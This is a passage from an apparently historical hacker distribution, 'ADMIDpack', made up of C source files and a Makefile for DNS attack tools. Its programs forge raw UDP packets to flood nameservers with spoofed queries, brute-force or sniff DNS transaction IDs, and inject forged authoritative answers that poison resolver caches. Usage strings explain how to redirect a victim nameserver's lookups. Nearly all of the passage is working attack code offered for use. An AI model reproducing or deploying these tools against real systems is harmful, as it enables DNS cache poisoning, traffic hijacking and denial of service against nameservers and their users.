   *( (u_short *) (data+strlen(data)+3) ) = htons(1);  
   i=strlen(data)+5;
   strcpy((data+i),data);
   i=(i+strlen(data)+1);
   *((u_short *) (data+i))     = htons(TYPE_PTR);
   *((u_short *) (data+i+2))   = htons(1);
   *((u_long *) (data+i+4))    = 9999999;
   *((u_short *) (data+i+8))   = htons(strlen(tmp)+1);
   strcpy((data+i+10),tmp);
   return(i+10+strlen(tmp)+1);
  }
}

void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
 struct dnshdr *dns;
 char buff[1024];
 char *data;
 int i;
 int on=1;
 int sraw;

if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
   perror("socket");
   exit(ERROR);
   }
   
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
  perror("setsockopt");
  exit(ERROR);
  }

dns  = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);

bzero(buff,sizeof(buff));

dns->id      = 6000+myrand();
dns->qr      = 0;
dns->rd      = 1;
dns->aa      = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,name,type);
udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i);
close(sraw);       
}                                   

void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
 {
 struct dnshdr *dns;
 char buff[1024];
 char *data;
 int i;
 int on=1;
 int sraw;
 
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
   perror("socket");
   exit(ERROR);
   }
   
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
  perror("setsockopt");
  exit(ERROR);
  }

dns  = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);

bzero(buff,sizeof(buff));

  dns->id      = htons(ID);
  dns->qr      = 1;
  dns->rd      = 1;
  dns->aa      = 1;
  dns->que_num = htons(1);
  dns->rep_num = htons(1);
  i=makepaketAW(data,name,spoofip,type);
  printf(" I apres Makepaket == %i \n",i);
  udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
  close(sraw);
 }           
                                     

void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
     {
     struct dnshdr *dns;
     char    buff[1024];
     char    *data;
     u_long fakeip;
     u_long trustip;
     u_long victimip;
     int loop,rere;
     
     dns  = (struct dnshdr *)buff;
     data = (char *)(buff+DNSHDRSIZE);
     
     
     
    trustip  = host2ip(dnstrust);
    victimip = host2ip(victim); 
    fakeip   = host2ip("12.1.1.0");
    
    /* send question ... */
   if( type ==  TYPE_PTR) 
     for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type);
   
   if( type == TYPE_A)
     for(loop=0;loop<4;loop++)
          sendquestion(fakeip,victimip,spoofname,type);
         
           
           /* now its time to awnser Quickly !!! */ 
     for(rere = 0; rere < 2;rere++){
        for(loop=0;loop < 80;loop++){
            printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
                 dnstrust,victim,spoofname,spoofip,ID+loop,type); 
          sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
         }
      }
    
    
    }
<-->
<++> ADMIDpack/ADMdnsfuckr.c
/*   ADM DNS DESTROYER  */


#define  DNSHDRSIZE 12
#define  VERSION    "0.2 pub"
#define  ERROR  -1

#include <stdio.h>
#include <stdlib.h>      
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

                     
void main(int argc, char **argv)
   {
	 struct   dnshdr *dns;
	 char            *data;
         char            buffer2[4000];
         unsigned char   namez[255];     
	 unsigned long   s_ip;
	 unsigned long   d_ip;                      
	 int sraw,on=1;


if(argc <2){printf(" usage : %s <host> \n",argv[0]); exit(0);}
	
 dns    = (struct dnshdr  *)buffer2;
 data   = (char *)(buffer2+12);
 bzero(buffer2,sizeof(buffer2));

if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
  perror("socket");
  exit(ERROR);
  }
  
 if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
   perror("setsockopt");
   exit(ERROR);
   }

printf("ADMdnsFuker %s  DNS DESTROYER  made by the ADM crew\n",VERSION);
printf("(c) ADM,Heike vouais tous se ki est as moi est a elle aussi ...\n");
sleep(1);

s_ip=host2ip("100.1.2.3");
d_ip=host2ip(argv[1]);

    
       
       dns->id      = 123;
       dns->rd      = 1;
       dns->que_num = htons(1);
      
      while(1){            
                           
                  sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());        
                  printf("%s\n",namez);
                  strcpy(data,namez);
                  *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
                  *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
                  udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
                  s_ip=ntohl(s_ip);
                  s_ip++;
                  s_ip=htonl(s_ip);   
              
            }

}
<-->
<++> ADMIDpack/ADMkillDNS.c

#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

#define   ERROR     -1
#define   VERSION  "0.3 pub"
#define   ID_START  1
#define   ID_STOP   65535
#define   PORT_START  53
#define   PORT_STOP   54

void main(int argc, char **argv)
   {
        
	 struct   dnshdr *dns;
	 char            *data;
         char            buffer2[4000];
         unsigned char   namez[255];    
	 unsigned long   s_ip,s_ip2;
	 unsigned long   d_ip,d_ip2;
         int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;


if(argc <5){
            system("/usr/bin/clear");
            printf(" usage : %s <ip src> <ip dst>  <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
            printf(" ip src: ip source of the dns anwser\n");
            printf(" ip dst: ip of the dns victim\n");
            printf(" name  : spoof name ex: www.dede.com\n");
            printf(" ip    : the ip associate with the name\n");
            printf(" options \n");
            printf(" [A,B,N]   \n");
            printf(" A: flood the DNS victim with multiple query\n");
            printf(" B: DOS attack for destroy the DNS \n");
            printf(" N: None attack \n\n");
            printf(" [ID_START]            \n");
            printf(" ID_START: id start :> \n\n");
            printf(" [ID_STOP]             n");
            printf(" ID_STOP : id stop :>  \n\n");
            printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n");
            printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION);
            exit(ERROR);
            }
 
 dns    = (struct dnshdr  *)buffer2;
 data   = (char *)(buffer2+DNSHDRSIZE);
 bzero(buffer2,sizeof(buffer2));
 
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
   perror("socket");
   exit(ERROR);
   }
   
 
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
  perror("setsockopt");
  exit(ERROR);
  }
 
 printf("ADMkillDNS %s",VERSION); 
 printf("\nouais ben mwa je dedie ca a ma Heike");
 printf("\nREADY FOR ACTION!\n"); 

s_ip2=s_ip=host2ip(argv[1]);
d_ip2=d_ip=host2ip(argv[2]);



if(argc>5)if(*argv[5]=='A')
 {
  for(loop=0;loop<10;loop++){
       dns->id      = 6000+loop;
       dns->qr      = 0;
       dns->rd      = 1;
       dns->aa      = 0;
       dns->que_num = htons(1);
       dns->rep_num = htons(0);
       i=makepaketQS(data,argv[3],TYPE_A); 
       udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);         
       s_ip=ntohl(s_ip);
       s_ip++;
       s_ip=htonl(s_ip);
       
       }
   } /* end of DNS flood query */

/* ici on trouve la routine contre un DOS */

if(argc>5)if(*argv[5]=='B')
  {
  	  s_ip=host2ip("100.1.2.3");
          dns->id      = 123;
          dns->rd      = 1;
          dns->que_num = htons(1);
             
     printf("plz enter the number of packet u wanna send\n");
     scanf("%i",&i);         
      for(x=0;x<i;x++){            
                           
                  sprintf(namez,"\3%d\3%d\3%d\3%d\07in-addr\04arpa",myrand(),myrand(),myrand(),myrand());        
                  strcpy(data,namez);
                  *( (u_short *) (data+strlen(namez)+1) ) = ntohs(12);
                  *( (u_short *) (data+strlen(namez)+3) ) = ntohs(1);
                  udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,14+strlen(namez)+5);
                  s_ip=ntohl(s_ip);
                  s_ip++;
                  s_ip=htonl(s_ip);   
                 printf("send packet num %i:%i\n",x,i);   
            }
      } /* end of DNS DOS */
   
 
if(argc > 6 )idstart = atoi(argv[6]);
else
  idstart = ID_START;
if(argc > 7 )idstop  = atoi(argv[7]);
else
  idstop = ID_STOP;
  
if(argc > 8 ){
  portstart = atoi(argv[8]);
  portstop  = atoi(argv[9]);
  }

 else {
   portstart = PORT_START;
   portstop  = PORT_STOP;
   }
           

bzero(buffer2,sizeof(buffer2));
bzero(namez,sizeof(namez));
i=0;
x=0;
s_ip=s_ip2;
d_ip=d_ip2;


 
    for(;idstart<idstop;idstart++){
       dns->id      = htons(idstart);
       dns->qr      = 1;
       dns->rd      = 1;
       dns->aa      = 1;
       dns->que_num = htons(1);
       dns->rep_num = htons(1);
       printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop);                                          
       i=makepaketAW(data,argv[3],argv[4],TYPE_A);
       for(;x < portstop; x++)
          udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
       x = portstart;
      }  
 
printf(" terminated..\n");
}
<-->
<++> ADMIDpack/ADMnOg00d.c
/***************************/
/* ADMnog00d (c) ADM       */
/***************************/
/*  ADM DNS ID PREDICTOR   */
/***************************/

#include <fcntl.h>
#include <unistd.h>           
#include "dns.h"
#include "ADM-spoof.c"
#include "ADMDNS2.c"


#define  VERSION "0.7 pub"
#define  SPOOFIP "4.4.4.4"
#define  ERROR  -1
#define  LEN   sizeof(struct sockaddr)
#define  UNDASPOOF "111.111.111.111"
#define  TIMEOUT 300
#define  DNSHDRSIZE 12

void usage()
{

   printf(" ADMnoG00D <your ip> <dns trust> <domaine trust> <ip victim> <TYPE> <spoof name> <spoof ip> <ns.trust.for.the.spoof> [ID] \n"); 
   printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
   printf(" well... we going to poison ns.victime.com for they resolv mouhhahaha.hol.fr in 31.3.3.7\n");
   printf(" we use provnet.fr and ns1.provnet for find ID of ns.victim.com\n");
   printf(" we use ns.isdnet.net for spoof because they have auth on *.hol.fr\n");
   printf(" for more information..\n");
   printf(" check ftp.janova.org/pub/ADM/ \n");
   printf(" mail  ADM@janova.org \n");
   printf(" ask Heike from me...:) \n"); 
   exit(-1); 
}  

void senddnspkt(s,d_ip,wwwname,ip,dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
 struct sockaddr_in sin;
 int  i;
 char buffer[1024];
 char *data = (char *)(buffer+DNSHDRSIZE);
 bzero(buffer,sizeof(buffer));
 memcpy(buffer,dns,DNSHDRSIZE);

if(dns->qr == 0)
  {
   i=makepaketQS(data,wwwname,TYPE_A);
   sin.sin_family = AF_INET;
   sin.sin_port   = htons(53);
   sin.sin_addr.s_addr = d_ip;
   sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
  }
 
 else
  {
  i=makepaketAW(data,wwwname,ip,TYPE_A);
  sin.sin_family = AF_INET;
  sin.sin_port   = htons(53);
  sin.sin_addr.s_addr = d_ip;
  sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
  }
}
                    
 
  

void dns_qs_no_rd(s,d_ip,wwwname,ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
struct dnshdr *dns;
char   *data;
char   buffer[1024];
int i;

dns  = (struct dnshdr *)buffer;
data = (char *)(buffer+DNSHDRSIZE);
bzero(buffer,sizeof(buffer));

       dns->id      = htons(ID);
       dns->qr      = 0;
       dns->rd      = 0; /* dont want the recusion !! */
       dns->aa      = 0;
       dns->que_num = htons(1);
       dns->rep_num = htons(0);
       i=makepaketQS(data,wwwname,TYPE_A);
       senddnspkt(s,d_ip,wwwname,NULL,dns);
}
       
    
                                                                
                     
void main(int argc, char **argv)
     {
         struct   sockaddr_in sin_rcp;
	 struct   dnshdr *dns,  *dns_recv;
	 char            *data, *data2;
         char            buffer2[4000];
         char            buffer[4000];
         char            spoofname[255];
         char            spoofip[255];
         char            dnstrust[255];
         char            bla[255];
         char            *alacon;
         unsigned char   fakename[255];
         unsigned char   namez[255];     
	 unsigned long   s_ip,  s_ip2;
	 unsigned long   d_ip,  d_ip2, trust;
         unsigned int    DA_ID = 65535, loop = 65535;                      
	          int    sraw, s_r, i, on=1, x, ID,timez;
	          int    len = sizeof(struct sockaddr);
 
 dns_recv = (struct dnshdr *)(buffer);
 data2    = (char *)(buffer+DNSHDRSIZE);
 dns      = (struct dnshdr *)buffer2;
 data     = (char *)(buffer2+DNSHDRSIZE);
 
 bzero(buffer2,sizeof(buffer2));
 srand(time(NULL));
        

if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){
     perror("socket");
     exit(ERROR);
     }  

 
  if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){
     perror("fcntl");
     exit(ERROR);
     }      
 
         
if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){
    perror("socket");
    exit(ERROR);
    }
    
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){
    perror("setsockopt");
    exit(ERROR);
    }
 
 if(argc < 2) usage();
 
 
 if(argc > 9 )DA_ID = loop = atoi(argv[9]);
  
if(argc > 6)strcpy(spoofname,argv[6]);
 else{
     printf("enter the name you wanna spoof:");
     scanf("%s",spoofname);
    }

if(argc > 7)strcpy(bla,argv[7]);
  else{
     printf("enter the ip's  of the spoof name:");
     scanf("%s",bla);
    }
  
  alacon =(char *)inet_ntoa(host2ip(bla));
  strcpy(spoofip,alacon);
    
    
  
  if( argc > 8 ) strcpy(bla,argv[8]);
  else{
      printf("enter the DNS trust of the victim:");
       scanf("%s",bla);
      }
  
  alacon =(char *)inet_ntoa(host2ip(bla));
  strcpy(dnstrust,alacon);
                       
             
 
 printf("ADMnoG00d %s\n",VERSION); 
 printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n");
 sleep(1);
 printf("\nLets Play =)!!\n");  

/* save some param */ 
s_ip2        = host2ip(argv[1]);
d_ip2 = d_ip = host2ip(argv[4]);
trust =        host2ip(argv[2]);
s_ip         = host2ip(UNDASPOOF);


while(1){

      
       sprintf(fakename,"%i%i%i%i%i%i.%s",
               myrand(),
               myrand(),
               myrand(),
               myrand(),
               myrand(),
               myrand(),
               argv[3]);
       
     sendquestion(s_ip,d_ip,fakename,TYPE_A);
       
      
    /* end of question packet */
   

    bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
    bzero(namez,sizeof(namez)); 
    i=0; 
    x=0;


/* here  start the spoof anwser */

ID = loop;

for(;loop >= ID-10 ;loop--){
       dns->id      = htons(loop);
       dns->qr      = 1;
       dns->rd      = 1;
       dns->aa      = 1;
       dns->que_num = htons(1);
       dns->rep_num = htons(1);
                                                 
       i=makepaketAW(data,fakename,SPOOFIP,TYPE_A);
       udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i);
    }
 
bzero(buffer2,sizeof(buffer2)); /* RE init some variable */
bzero(namez,sizeof(namez));
i=0;
x=0;
             
 /* time for test spoof     */

 dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */
                                            /* non recursive ! */
     
 /* we waiting for awnser ... */
     
 while(1){    
  for(timez=0;timez < TIMEOUT; timez++){
     if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 )
       {
        printf("ok whe have the reponse ;)\n");
        timez = 0;
        break;
       }
     usleep(10);
     timez++;
    }
   if(timez != 0){
     printf("hum no reponse from the NS ressend question..\n");
     dns_qs_no_rd(s_r,d_ip2,fakename,myrand());
     }
   else break;
 } 
   /* ok we have a awnser */
   printf("fakename = %s\n",fakename);
       if(sin_rcp.sin_addr.s_addr ==  d_ip2 )
          if(sin_rcp.sin_port == htons(53) )
            {
             if( dns_recv->qr == 1 )
                if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */                                              
                       printf("try %i < ID < %i \n",ID-10,ID);
         
                    else{
                     /* Hoho we have  the spoof has worked we have found the right ID ! */
                     printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop);
                     printf("let's send the spoof...\n");
                     dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5]));          
                     printf("spoof sended ...\n");
                     exit(0);
                     }                  
              } /* end of if (sin_rcp.sin_port == htons(53) ) */
      bzero(buffer,sizeof(buffer));    
           
  } /* end of while loop */ 

}/* end of proggies */ 
<-->
<++> ADMIDpack/ADMsnOOfID.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"
#include <pcap.h>
#include <net/if.h>

#define  DNSHDRSIZE 12
#define  SPOOF      "127.0.0.1"       
#define  VERSION    "ver 0.6 pub"
#define  ERROR      -1

int ETHHDRSIZE;
                     
void main(argc, argv)
int argc;
char *argv[];
   {
   struct pcap_pkthdr h;
   struct pcap *pcap_d;
      	 struct   iphdr  *ip;
	 struct   udphdr *udp;
	 struct   dnshdr *dnsrecv,*dnssend;
	 char            *data;
	 char            *data2;
	 char            *buffer;
         char            namefake[255];
         char            buffer2[1024];
	 char            ebuf[255];
	 char            spoofname[255];
	 char            spoofip[255];
	 char            bla[255];
	 char            dnstrust[255];
	 char            *alacon;
	 unsigned long   s_ipns;
	 unsigned long   d_ip;                     
	 
	 int  sraw, i, on=1, con, ID,DA_ID,type;

srand( (time(NULL) % random() * random()) );


if(argc <2){
  printf("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoofname> <spoof ip> <ns trust> \n",argv[0]); 
  printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr  \n",argv[0]);
  printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); 
  exit(0);
  }

if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
 else ETHHDRSIZE = 14;

if(argc>5)type=atoi(argv[5]);


if(argc > 6)strcpy(spoofname,argv[6]);
 else{
  printf("enter the name you wanna spoof:");
  scanf("%s",spoofname);
 }
 
 if(argc > 7)strcpy(bla,argv[7]);
 else{
      printf("enter the ip's  of the spoof name:");
      scanf("%s",bla);
    }
                               
 alacon =(char *)inet_ntoa(host2ip(bla));
 strcpy(spoofip,alacon);
                                   
if(argc > 8)strcpy(bla,argv[8]);
else{
    printf("enter the dns trust for the spoof\n");
    scanf("%s",bla);
    }
  alacon =(char *)inet_ntoa(host2ip(bla));
  strcpy(dnstrust,alacon);
   
 
 dnssend = (struct dnshdr  *)buffer2;
 data2   = (char *)(buffer2+DNSHDRSIZE);

 bzero(buffer2,sizeof(buffer2));
   
   
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
  perror("socket");
  exit(ERROR);
  }
  
if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
 perror("setsockopt");
 exit(ERROR);
 }
 
 printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION);
 printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n");
 sleep(1);
 
 pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf);

s_ipns = host2ip(argv[4]);
d_ip   = host2ip(argv[2]);
con    = myrand();

/* make the question for get the ID */

sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); 
dnssend->id      = 2600;
dnssend->qr      = 0;
dnssend->rd      = 1;
dnssend->aa      = 0;
dnssend->que_num = htons(1);
dnssend->rep_num = htons(0);
i = makepaketQS(data2,namefake,TYPE_A);
udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i);
printf("Question sended...\n");                                                                
printf("Its Time to w8 \n");

while(1)
{ 
  buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */  
  
  ip      = (struct iphdr   *)(buffer+ETHHDRSIZE);
  udp     = (struct udphdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE);
  dnsrecv = (struct dnshdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
  data    = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

if(ip->protocol == IPPROTO_UDP){
printf("[%s:%i ->",inet_ntoa(ip->saddr),ntohs(udp->source));
printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest));
}

    if(ip->protocol == 17 )     
      if(ip->saddr.s_addr  == d_ip )
        if(ip->daddr.s_addr == s_ipns ) 
          if(udp->dest  == htons(53) )
            if(dnsrecv->qr == 0 )
             {
             printf("kewl :)~ we have the packet !\n");
             
             ID = dnsrecv->id ;    /* we get the id         */
             
             printf("the current id of %s is %d \n",argv[2],ntohs(ID));
             
             DA_ID = ntohs(ID);
           
    
             printf("send the spoof...\n");
            
             dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); 
           
             printf("spoof sended...\n");
            
             exit(0);
            }    
      
      
 
  }
 
  /* well now we have the ID we cant predict the ID */ 
 
 }
<-->
<++> ADMIDpack/ADMsniffID.c

#include <pcap.h>

#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

#define  ERROR	    -1                
#define  DNSHDRSIZE 12    
#define  VERSION    "ver 0.4 pub" 

int ETHHDRSIZE;

void usage(){
 printf("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n");
 printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n");
 exit(ERROR);
}       
                     
void main(int argc, char **argv)
   {     
   struct pcap_pkthdr h;
   struct pcap *pcap_d;
	 struct   iphdr  *ip;
	 struct   udphdr *udp;
	 struct   dnshdr *dnsrecv,*dnssend;
	 char            *data;
	 char            *data2;
	 char            *buffer;
         char            SPOOFIP[255];
         char            bla[255];
         char            spoofname[255];
         char            tmp2[255];
         char            ebuf[255];
         char            buffer2[1024];    
         unsigned char   namez[255];                          
	 int sraw,on=1,tmp1,type;


if(argc <2)usage();
if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0;
  else ETHHDRSIZE = 14; 
	
strcpy(SPOOFIP,argv[2]);
strcpy(spoofname,argv[3]);
type = atoi(argv[4]);
  
/* Buffer 'n' tcp/ip stuff */
 
 dnssend = (struct dnshdr  *)buffer2;
 data2   = (char *)(buffer2+12);

 
 
 /* bzero(buffer,sizeof(buffer));          */
 bzero(bla,sizeof(bla));
 bzero(buffer2,sizeof(buffer2));
   
  
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
    perror("socket");
    exit(ERROR);
    }

if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
  perror("setsockopt");
  exit(ERROR);
  }    
 
 /* open pcap descriptor */
 
 pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf);
        
printf("ADMsniffID %s (c) ADMnHeike\n",VERSION);

while(1){    
 
 buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */
  
    
 ip      = (struct iphdr   *)(buffer+ETHHDRSIZE);
 udp     = (struct udphdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE);
 dnsrecv = (struct dnshdr  *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE);
 data    = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE);

 if(ip->protocol == 17)
  if(udp->dest == htons(53) )    
    if(dnsrecv->qr == 0)
      {
     strcpy(namez,data); 
     nameformat(namez,bla);
     printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); 
             
     bzero(bla,sizeof(bla));
     printf("the question have the type %i and type of the query %i\n"
            ,ntohs(*((u_short *)(data+strlen(data)+1)))
            ,ntohs(*((u_short *)(data+strlen(data)+2+1))));
    
     /* well in diz version we only spoof  the type 'A'       */
     /* check out for a new version in ftp.janova.org/pub/ADM */
       
   
     printf("make the spoof packet...\n");
     printf("dns header\n");  

     /* here we gonna start to make the spoofed paket :)*/
       
       memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5);
       
       dnssend->id=dnsrecv->id;         /* haha the ID ;)     */   
       dnssend->aa=1;  		        /* i've the authority */ 
       dnssend->ra=1;                   /* i've the recusion  */
       dnssend->qr=1;                   /* its a awser        */
       dnssend->rep_num = htons(1);     /* i've one awnser    */

            
     printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n"
            ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num));  
     printf("Question..\n");
     printf("domainename=%s\n",data2);
     printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1))));
     printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2))));
     
      if( type ==   TYPE_PTR){ 
        tmp1=strlen(namez)+5;
        strcpy(data2+tmp1,namez);
        tmp1=tmp1+strlen(namez)+1;                            
        
        bzero(tmp2,sizeof(tmp2));
        nameformat(spoofname,tmp2); 
        printf("tmp2 = %s\n",tmp2);
     
      
      printf(" mouhahahah \n");
      *((u_short  *)(data2+tmp1)) = htons(TYPE_PTR);   
      *((u_short  *)(data2+tmp1+2))       = htons(1);
      *((u_long *)(data2+tmp1+2+2))       = htonl(86400);
      *((u_short  *)(data2+tmp1+2+2+4))   = htons(strlen((tmp2)+1));
      printf("bhaa?.\n");
      strcpy((data2+tmp1+2+2+4+2),tmp2);
      printf(" ouf !! =) \n");
      tmp1 = tmp1 +strlen(tmp2)+ 1;
   
    }
      
      if( type  == TYPE_A){
      tmp1=strlen(namez)+5;
      strcpy(data2+tmp1,namez);
      tmp1=tmp1+strlen(namez)+1;
      *((u_short  *)(data2+tmp1))         = htons(TYPE_A);
      *((u_short  *)(data2+tmp1+2))       = htons(1);
      *((u_long *)(data2+tmp1+2+2))       = htonl(86400);      
      *((u_short  *)(data2+tmp1+2+2+4))   = htons(4);
      *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP);
                  
      }
                        
    printf("Answer..\n");
    printf("domainname=%s\n",tmp2);
    printf("type=%i\n",ntohs(*((u_short  *)(data2+tmp1))));
    printf("classe=%i\n",ntohs(*((u_short  *)(data2+tmp1+2))));
    printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2))));
    printf("resource data lenght=%i\n",ntohs(*((u_short  *)(data2+tmp1+2+2+4))));
    printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2))));
    
    tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */
    			 /* without the dnshdr                         */
          
      
      udp_send(sraw
              ,ip->daddr
              ,ip->saddr
              ,ntohs(udp->dest)
              ,ntohs(udp->source)
              ,buffer2
              ,DNSHDRSIZE+tmp1);
           } /* end of the spoof             */           
  } /* end of while(1)                     */
} /* The End !! ;)                        */
<-->
<++> ADMIDpack/Makefile
# version 0.1
#/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS 
SHELL  = /bin/sh
# uncomment this if your are not on LinuX
#LIBS   = -lsocket -lnsl -lpcap
#
CC = gcc
LIBS = -lpcap
BIN = .
CFLAGS = -I. -L.  
all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d

ADMkillDNS: ADMkillDNS.c
	$(CC) $(CFLAGS) ADMkillDNS.c  $(LIBS) -o $(BIN)/ADMkillDNS 

ADMsnOOfID: ADMsnOOfID.c
	$(CC) $(CFLAGS) ADMsnOOfID.c  $(LIBS) -o $(BIN)/ADMsnOOfID 

ADMsniffID: ADMsniffID.c
	$(CC) $(CFLAGS) ADMsniffID.c  $(LIBS) -o $(BIN)/ADMsniffID 

ADMdnsfuckr: ADMdnsfuckr.c
	$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr  

ADMnOg00d: ADMnOg00d.c
	$(CC) $(CFLAGS) ADMnOg00d.c   $(LIBS) -o $(BIN)/ADMnOg00d   

clean:
	rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
	$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
<-->
<++> ADMIDpack/bpf.h
/*-
 * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from the Stanford/CMU enet packet filter,
 * (net/enet.c) distributed as part of 4.3BSD, and code contributed
 * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence 
 * Berkeley Laboratory.
 *
